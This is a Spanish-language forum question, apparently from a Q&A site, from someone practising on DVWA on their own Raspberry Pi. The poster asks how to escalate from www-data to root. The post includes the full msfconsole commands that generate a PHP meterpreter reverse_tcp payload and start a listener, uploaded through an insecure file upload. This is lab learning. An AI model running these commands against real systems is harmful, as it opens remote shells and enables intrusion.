Estoy perdiendo el tiempo con Kali Linux, MSFConsole y DVWA (Damn Vulnerable Web Application).
He logrado ingresar al sistema (Raspberry Pi) al crear una puerta trasera de PHP y la cargué mediante inyección SQL.
Ahora tengo acceso al sistema, el único problema es que estoy ejecutando como www-data (¡¿no sería bueno convertirse en root para crear tu propia cuenta de superusuario ?!) ¿Es posible escalar los privilegios en Linux (Raspbaian) utilizando MSFConsole, BASH (desde la puerta trasera) o de otra manera?
He intentado ejecutar "use priv" en el indicador de meterpreter, pero el error que recibo es 'Error al cargar la extensión: no se encontró ningún módulo con el nombre ext_server_priv.php'. Si me ayuda, estoy ejecutando el exploit reverse_tcp como un script PHP.
Pude comprometer el sistema ejecutando esto es Msfconsole
use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit
Luego subí hackme.php al servidor web a través de la carga insegura de archivos, después de haberlo hecho, busqué en el archivo cargado.
El crédito va a este video por darme el código anterior. (Tuve que usar la función de generar en lugar de msfpayload porque esa funcionalidad se ha movido debido a que está en desuso).